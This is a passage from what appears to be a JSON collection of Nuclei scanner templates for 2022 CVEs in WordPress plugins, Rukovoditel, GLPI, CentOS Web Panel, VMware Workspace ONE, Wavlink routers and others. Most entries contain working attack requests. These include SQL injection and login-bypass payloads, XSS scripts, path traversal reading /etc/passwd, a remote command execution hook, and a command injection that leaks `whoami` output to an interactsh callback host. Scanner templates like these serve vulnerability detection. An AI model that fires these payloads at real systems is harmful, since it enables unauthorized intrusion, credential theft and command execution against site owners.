charset=UTF-8\n\norder_by=id`,if(SUBSTRING('test',1,1)='t',sleep(6),sleep(0))--+-&path=component%2Ftable_manager%2Fview%2Fcu_users&uniqueClass=wrapper_content_919044\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"list_admin_table\")"],"condition":"and"}]}]},{"id":"CVE-2022-22972","info":{"name":"VMware Workspace ONE Access/Identity Manager/vRealize Automation - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /vcac/ HTTP/1.1\nHost: {{Hostname}}\n","GET /vcac/?original_uri={{RootURL}}%2Fvcac HTTP/1.1\nHost: {{Hostname}}\n","POST /SAAS/auth/login/embeddedauthbroker/callback HTTP/1.1\nHost: {{interactsh-url}}\nContent-type: application/x-www-form-urlencoded\n\nprotected_state={{protected_state}}&userstore={{userstore}}&username=administrator&password=horizon&userstoreDisplay={{userstoreDisplay}}&horizonRelayState={{horizonRelayState}}&stickyConnectorId={{stickyConnectorId}}&action=Sign+in\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["HZN="]},{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","name":"protected_state","group":1,"regex":["id=\"protected_state\" value=\"([a-zA-Z0-9]+)\"\\/>"],"internal":true,"part":"body"},{"type":"regex","name":"horizonRelayState","group":1,"regex":["name=\"horizonRelayState\" value=\"([a-z0-9-]+)\"\\/>"],"internal":true,"part":"body"},{"type":"regex","name":"userstore","group":1,"regex":["id=\"userstore\" value=\"([a-z.]+)\" \\/>"],"internal":true,"part":"body"},{"type":"regex","name":"userstoreDisplay","group":1,"regex":["id=\"userstoreDisplay\" readonly class=\"login-input transparent_class\" value=\"(.*)\"/>"],"internal":true,"part":"body"},{"type":"regex","name":"stickyConnectorId","group":1,"regex":["name=\"stickyConnectorId\" value=\"(.*)\"/>"],"internal":true,"part":"body"},{"type":"kval","name":"HZN-Cookie","kval":["HZN"],"part":"header"}]}]},{"id":"CVE-2022-0201","info":{"name":"WordPress Permalink Manager <2.2.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?p=%3Cimg%20src%20onerror=alert(/XSS/)%3E&debug_url=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(/XSS/)>","pm_query"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2022-1768","info":{"name":"WordPress RSVPMaker <=9.3.2 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-json/rsvpmaker/v1/stripesuccess/anythinghere HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nrsvp_id=(select(0)from(select(sleep(5)))a)&amount=1234&email=randomtext\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=5"]},{"type":"word","part":"body","words":["\"payment_confirmation_message\":"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4057","info":{"name":"Autoptimize < 3.1.0 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/uploads/ao_ccss/queuelog.html","{{BaseURL}}/blog/wp-content/uploads/ao_ccss/queuelog.html"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Job id &lt;","log messages"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43164","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=global_lists/lists&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&notes=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-1391","info":{"name":"WordPress Cab fare calculator < 1.0.4 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1168","info":{"name":"WordPress WP JobSearch <1.5.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/jobsearch/?search_title=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28domain%29%3E&ajax_filter=true&posted=all&sort-by=recent"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(domain)>","wp-jobsearch"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-27927","info":{"name":"Microfinance Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /mims/updatecustomer.php?customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5({{num}}),1,2),NULL,NULL,NULL,NULL,NULL,NULL' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-48165","info":{"name":"Wavlink - Improper Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportLogs.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Password=","Login="],"condition":"and"},{"type":"word","part":"header","words":["filename=\"sysLogs.txt\""]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["Password=([^\\s]+)"]}]}]},{"id":"CVE-2022-35914","info":{"name":"GLPI <=10.0.2 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: sid=foo\n\nsid=foo&hhook=exec&text={{cmd}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26960","info":{"name":"elFinder <=2.1.60 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25489","info":{"name":"Atom CMS v2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/widgets/debug.php?a=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Path Array","console-debug"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43170","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=dashboard_configure/index&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&type=info_block&is_active=1&sections_id=0&color=default&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&icon=&description=&sort_order=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-4320","info":{"name":"WordPress Events Calendar <1.4.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_calendar&id=XX\"><script>alert(document.cookie)</script>","{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_dismisshint&callback=<script>alert(document.cookie)</script>","{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_displayday&callback=1&bymethod=&by_id=/../../../../../../r%26_=--><script>alert(document.cookie)</script>"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["imgNavLeftXX\\\"><script>alert(document.cookie)</script>","<script>alert(document.cookie)</script>({});","><script>alert(document.cookie)</script>.js"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-46071","info":{"name":"Helmet Store Showroom v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername='+OR+1%3D1+--+-&password=1234\n","GET /admin/ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"Helmet Store\") && contains(body_2, \"Adminstrator Admin\")"],"condition":"and"}]}]},{"id":"CVE-2022-2546","info":{"name":"WordPress All-in-One WP Migration <=7.62 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=ai1wm_export HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1&options%5Breplace%5D%5Bnew_value%5D%5B%5D=XSSPAYLOAD%3Csvg+onload=alert(document.domain)%3E&ai1wm_manual_export=1&secret_key={{secretkey}} HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_3, \"text/html\")","status_code_3 == 200","contains(body_3, '{\\\"new_value\\\":[\\\"XSSPAYLOAD<svg onload=alert(document.domain)>')"],"condition":"and"}],"extractors":[{"type":"regex","name":"secretkey","group":1,"regex":["ai1wm_feedback\"},\"secret_key\":\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2022-32770","info":{"name":"WWBN AVideo 11.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?toast=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["text: \"</script><script>alert(document.cookie);</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-44952","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=configuration/save&redirect_to=configuration/application HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryMh2HSjWbM7zJjWOA\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"form_session_token\"\n\n{{nonce}}\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_NAME]\"\n\nTest\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_SHORT_NAME]\"\n\ntest\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"APP_LOGO\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_LOGO]\"\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_LOGO_URL]\"\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"APP_FAVICON\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_FAVICON]\"\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_COPYRIGHT_NAME]\"\n\n<script>alert(document.domain)</script>\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_LANGUAGE]\"\n\nenglish.php\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_SKIN]\"\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_TIMEZONE]\"\n\nAmerica/New_York\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_ROWS_PER_PAGE]\"\n\n10\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_DATE_FORMAT]\"\n\nm/d/Y\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_DATETIME_FORMAT]\"\n\nm/d/Y H:i\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_NUMBER_FORMAT]\"\n\n2/./*\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_FIRST_DAY_OF_WEEK]\"\n\n0\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[DROP_DOWN_MENU_ON_HOVER]\"\n\n0\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[DISABLE_CHECK_FOR_UPDATES]\"\n\n0\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA--\n","@timeout: 5s\nGET /index.php?module=dashboard/ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_4 == 200","contains(content_type_4, \"text/html\")","contains(body_4, \"<script>alert(document.domain)</script>\")","contains(body_4, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-37299","info":{"name":"Shirne CMS 1.2.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=/etc/passwd&maxwidth=-1&referer=test"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["cm9vd"]},{"type":"word","part":"header","words":["image/png"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32015","info":{"name":"Complete Online Job Search System 1.0 - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?q=category&search=Banking%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,md5({{num}}),15,16,17,18,19--+"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2022-35493","info":{"name":"eShop 3.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/home/get_products?search=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["Search Result for \\\"><img src=x onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31978","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /classes/Master.php?f=delete_inquiry HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"status\\\":\\\"success\")"],"condition":"and"}]}]},{"id":"CVE-2022-33174","info":{"name":"Powertek Firmware <3.30.30 - Authorization Bypass","severity":"high"},"requests":[{"raw":["GET /cgi/get_param.cgi?xml&sys.passwd&sys.su.name HTTP/1.1\nHost: {{Hostname}}\nCookie: tmpToken=;\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<sys.passwd>","<sys.su.name>"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["<sys\\.passwd>([A-Z0-9a-z]+)<\\/sys\\.passwd>","<sys\\.su\\.name>([a-z]+)<\\/sys\\.su\\.name>"],"part":"body"}]}]},{"id":"CVE-2022-1595","info":{"name":"WordPress HC Custom WP-Admin URL <=1.4 - Admin Login URL Disclosure","severity":"medium"},"requests":[{"raw":["HEAD /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nCookie: valid_login_slug=1\n","HEAD /wp-login.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 302","contains(header_1, 'wordpress_')","contains(header_1, 'Location')"],"condition":"and"},{"type":"dsl","dsl":["status_code_2 != 302"]}]}]},{"id":"CVE-2022-1221","info":{"name":"WordPress Gwyn's Imagemap Selector <=0.3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1&class=%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script> popup-"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24265","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","@timeout: 20s\nPOST /components/menu/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npath=component%2Fmenu%2F%26menu_filter%3D3'+and+sleep(6)--+-&data_get=eyJtZW51X2ZpbHRlciI6IjMifQ%3D%3D&uniqueClass=wrapper_content_906185\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"menu/html/edit.php\")"],"condition":"and"}]}]},{"id":"CVE-2022-1910","info":{"name":"WordPress Shortcodes and Extra Features for Phlox <2.9.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=aux_the_recent_products&data[wp_query_args][post_type]=post&data[title]=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["widget-title\"><script>alert(document.domain)</script></h3>","aux-widget"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0678","info":{"name":"Microweber <1.2.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/demo/api/logout?redirect_to=/asdf%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>","content=\"Microweber\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-39952","info":{"name":"Fortinet FortiNAC - Arbitrary File Write","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/configWizard/keyUpload.jsp"],"body":"--{{boundaryId}}\nContent-Disposition: form-data; name=\"key\"; filename=\"{{to_lower(rand_text_alphanumeric(8))}}.zip\"\n\n{{randstr}}\n--{{boundaryId}}--\n","headers":{"Content-Type":"multipart/form-data; boundary={{boundaryId}}"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["zipUploadSuccess","SuccessfulUpload"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-42747","info":{"name":"CandidATS 3.0.0 - Cross-Site Scripting.","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&sortDirection=desc&indexFile=1&isPopup=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","candidat"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-38637","info":{"name":"Hospital Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /hms/user-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>User  | Dashboard</title>","Book My Appointment"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34047","info":{"name":"WAVLINK WN530HG4 - Improper Access Control","severity":"high"},"requests":[{"raw":["GET /set_safety.shtml?r=52300 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var syspasswd=\"","<title>APP</title>"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["syspasswd=\"(.+?)\""]}]}]},{"id":"CVE-2022-3506","info":{"name":"WordPress Related Posts <2.1.3 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=rp4wp HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption_page=rp4wp&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Drp4wp&rp4wp%5Bautomatic_linking%5D=1&rp4wp%5Bautomatic_linking_post_amount%5D=3&rp4wp%5Bheading_text%5D=%22+autofocus+onfocus%3Dalert%28document.domain%29%3E&rp4wp%5Bexcerpt_length%5D=15&rp4wp%5Bcss%5D=.rp4wp-related-posts+ul%7Bwidth%3A100%25%3Bpadding%3A0%3Bmargin%3A0%3Bfloat%3Aleft%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%7Blist-style%3Anone%3Bpadding%3A0%3Bmargin%3A0%3Bpadding-bottom%3A20px%3Bclear%3Aboth%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%3Ep%7Bmargin%3A0%3Bpadding%3A0%3B%7D%0D%0A.rp4wp-related-post-image%7Bwidth%3A35%25%3Bpadding-right%3A25px%3B-moz-box-sizing%3Aborder-box%3B-webkit-box-sizing%3Aborder-box%3Bbox-sizing%3Aborder-box%3Bfloat%3Aleft%3B%7D\n","GET /wp-admin/options-general.php?page=rp4wp&settings-updated=true HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_4, 'text/html')","status_code_4 == 200","contains(body_4, \"value=\\\"\\\" autofocus onfocus=alert(document.domain)>\")","contains(body_4, 'The amount of automatically')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-z]+)\" />"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-0692","info":{"name":"Rudloff alltube prior to 3.0.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-2373","info":{"name":"WordPress Simply Schedule Appointments <1.5.7.7 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/ssa/v1/users"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","regex":["response_code\":200","\"email\":\"([a-zA-Z-_0-9@.]+)\",\"display_name\":\"([a-zA-Z-_0-9@.]+)\",\"gravatar_url\":\"http?:\\\\\\/\\\\\\/([a-z0-9A-Z.\\\\\\/?=&@_-]+)\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-44877","info":{"name":"CentOS Web Panel 7 <0.9.8.1147 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&password=toor&commit=Login\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Login Redirect."]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","group":1,"regex":["([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"],"part":"interactsh_request"}]}]},{"id":"CVE-2022-45354","info":{"name":"Download Monitor <= 4.7.60 - Sensitive Information Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/download-monitor/v1/user_data"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"registered\":","\"display_name\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31974","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?page=reports&date=2022-05-27%27%20union%20select%201,2,3,md5('{{num}}'),5,6,7,8,9,10--+"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34045","info":{"name":"WAVLINK WN530HG4 - Improper Access Control","severity":"critical"},"requests":[{"raw":["GET /backupsettings.dat HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Salted__"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31977","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /classes/Master.php?f=delete_team HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"status\\\":\\\"success\\\"}\")"],"condition":"and"}]}]},{"id":"CVE-2022-0594","info":{"name":"WordPress Shareaholic <9.7.6 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=shareaholic_debug_info"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["plugin_version","shareaholic_server_reachable"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24181","info":{"name":"PKP Open Journal Systems 2.4.8-3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /iupjournals/index.php/esj 